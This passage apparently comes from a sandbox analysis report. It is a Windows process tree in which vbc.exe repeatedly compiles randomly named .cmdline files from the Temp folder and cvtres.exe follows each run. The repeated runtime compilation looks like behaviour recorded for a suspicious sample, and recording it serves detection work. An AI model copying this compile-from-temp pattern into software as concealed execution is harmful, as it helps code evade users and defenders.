C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES92C3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFA9D832F6EB943119FCA746C138F821.TMP"5⤵PID:14412
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\alxzehtn.cmdline"4⤵PID:14148
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9822.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc747D669554334B839DF4BC5F52C5F7B.TMP"5⤵PID:164
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dlq16eki.cmdline"4⤵PID:12712
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D33.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEE9AA94795294F708C74F8B41CDE4F1.TMP"5⤵PID:11436
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vqmqovr6.cmdline"4⤵PID:10188
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA198.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc81CBA6AD267947AAACCE817F13AA1EE.TMP"5⤵PID:11924
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wpfnrara.cmdline"4⤵PID:10652
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA62C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6FB4F879185A4DA7B04F7DA892852DB0.TMP"5⤵PID:5492
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y_k0c9_m.cmdline"4⤵PID:7956
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB0E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc76E4BD7C97D42099096D2DA2158EF53.TMP"5⤵PID:12100
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b6gu0bxa.cmdline"4⤵PID:9484
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB00F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB136B18FFDA546058AF0258713B7D61F.TMP"5⤵PID:7752
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wf6h4aqm.cmdline"4⤵PID:9964
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB56E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC3ED7726BE542B8BEE35246A144396.TMP"5⤵PID:10344
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w6dtd5aj.cmdline"4⤵PID:8068
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9E3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBC9B2B5F23DC4839B523F1C2F428E7E.TMP"5⤵PID:14636
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\upeu4bpw.cmdline"4⤵PID:10668
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF42.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA259085946346CE96139BE89DA0CC9E.TMP"5⤵PID:10060
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dvojuzw7.cmdline"4⤵PID:5584
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3D6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc62C8BEF5C5D94F4BAE4072A17AEB9E42.TMP"5⤵PID:14280
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\32hjf1ys.cmdline"4⤵PID:15096
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8C7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6E3745DCCAFB42959ADFD64EF18C5FA.TMP"5⤵PID:13036
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gvpvfdug.cmdline"4⤵PID:14388
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE26.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc97252F16FD1A4676A79497B32CCE3061.TMP"5⤵PID:13148
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zr2hl6ve.cmdline"4⤵PID:5400
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3D3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5B7EC2327A34027A257BC51FA93CDB6.TMP"5⤵PID:2036
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mk9nop9p.cmdline"4⤵PID:14100
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD589.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc523D3E3A512A4299AD9AB34F7CD51627.TMP"5⤵PID:9084
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nspepiyq.cmdline"4⤵PID:13136
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD74E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9A3AF9EA757741E0A66C51E3F9813BE8.TMP"5⤵PID:11328
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bjeqycl5.cmdline"4⤵PID:6024
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD8E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7946AB8C3BF46AD88459A6CBD2986EA.TMP"5⤵PID:7716
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f4u9chr1.cmdline"4⤵PID:1740
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB94.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF408B87567E84DEDA9D0F8867A709486.TMP"5⤵PID:9096
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ohydpg6g.cmdline"4⤵PID:15172
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD59.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4D1CFF6B5F1F4A6699749D71E8D556B1.TMP"5⤵PID:5932
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fsmac4xj.cmdline"4⤵PID:12264
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF5D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF14DC707CB2458AA345A993503B96.TMP"5⤵PID:12784
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\m4tcgx3c.cmdline"4⤵PID:1084
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE122.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc434809516C6545E4B664D6A49D74FFC.TMP"5⤵PID:3240
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b331tvj3.cmdline"4⤵PID:15112
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE41F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc347E1030EB04B46BCF2269CEC06E10.TMP"5⤵PID:8412
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\afw1foxa.cmdline"4⤵PID:7900
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA78.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFD6C85E089774F5494D9A3A09FCF44DD.TMP"5⤵PID:6840
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\40tt-vhf.cmdline"4⤵PID:12460
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0F1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2E7C0FFF4F634ADEB0B442FA14D9E92.TMP"5⤵PID:8784
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bff9lrsx.cmdline"4⤵PID:9132
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF70B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA1BDB1A59C5F4580B8A0D3ADEFB1E676.TMP"5⤵PID:7696
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q6-m33tn.cmdline"4⤵PID:6324
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFBB88B8A8ED748F1A4ACEFD8EC6FB1B3.TMP"5⤵PID:15252
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ditumw2b.cmdline"4⤵PID:12016
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5E722F098A2945AD81BFE436BDA8E341.TMP"5⤵PID:13392
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9agfgf1d.cmdline"4⤵PID:9868
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CB4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4915A0BEF6EC4AFB94616F6FAB08231.TMP"5⤵PID:12036
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xpij3bnl.cmdline"4⤵PID:11392
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2918.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDB70539BA5EF4669BF4CF0BB303E3CC.TMP"5⤵PID:6040
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xblrqgpx.cmdline"4⤵PID:6636
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3944.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2B46CDC25E354DE5A68A5D3FBF27C7D7.TMP"5⤵PID:8780
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ylvysygl.cmdline"4⤵PID:6160
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES45C7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBE28841FD6364BE8A1A1B7D24E4C2FF0.TMP"5⤵PID:13628
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bfn77ref.cmdline"4⤵PID:11424
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55F4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA69B297B6B294326819FF25561A0C75F.TMP"5⤵PID:14400
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5g_7jqsv.cmdline"4⤵PID:8508
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61BC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF3A96749252F49B8BDAFB3CB5ACA5E1C.TMP"5⤵PID:8024
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\owkeqgoj.cmdline"4⤵PID:9056
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES714C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB4803A1284344DDC8D34595458EDC10.TMP"5⤵PID:12188
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fm9yjec0.cmdline"4⤵PID:6028
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F36.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5A47EDA0F5414FD3AD5A68525B277FA.TMP"5⤵PID:10824
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e2olh62u.cmdline"4⤵PID:10308
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DCD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc63A3008E467840CD8B9FCB5EC1CCED1B.TMP"5⤵PID:2124
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mo1zrbex.cmdline"4⤵PID:9616
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9EA5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc439EBBB3127D4E65ABE52D1CD75CF77E.TMP"5⤵PID:14240
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xloaucgj.cmdline"4⤵PID:14044
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8D7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc522E92073E9F4EA6927CCDA73931B787.TMP"5⤵PID:4592
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sougktqo.cmdline"4⤵PID:8236
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB50C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD24A7291BA294C37AB633438DAB47AE0.TMP"5⤵PID:14568
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dpzwxw8d.cmdline"4⤵PID:13792
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc862DFA671EA44AC08B32E6DCCF91D3.TMP"5⤵PID:11844
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nx-hdhis.cmdline"4⤵PID:7108
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC47D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6E49E4574094C6396DFE7FEC492D4D4.TMP"5⤵PID:8516
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kjihv46i.cmdline"4⤵PID:15144
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCCE9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA34E8803101247DF985E4BA594861D12.TMP"5⤵PID:12260
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\scc5usts.cmdline"4⤵PID:6420
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4C9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF80111E997504C6F82C2E621DC80A4.TMP"5⤵PID:12388
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3a3uqdsn.cmdline"4⤵PID:14776
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDB2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE87CC2F148284AA28A75A160A7FDE5CE.TMP"5⤵PID:1616
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gw5qwvbh.cmdline"4⤵PID:11092
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6AB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc37833A52E30E48A889267BD99AFD52DA.TMP"5⤵PID:11652
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mgamxivc.cmdline"4⤵PID:12816
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF253.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE8544368B81A4205A979DFE5D7FA20C.TMP"5⤵PID:11748
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8hbuxyrc.cmdline"4⤵PID:10668
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB6B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB142C154614419CBBABD28966144DD1.TMP"5⤵PID:5580
-
-
-
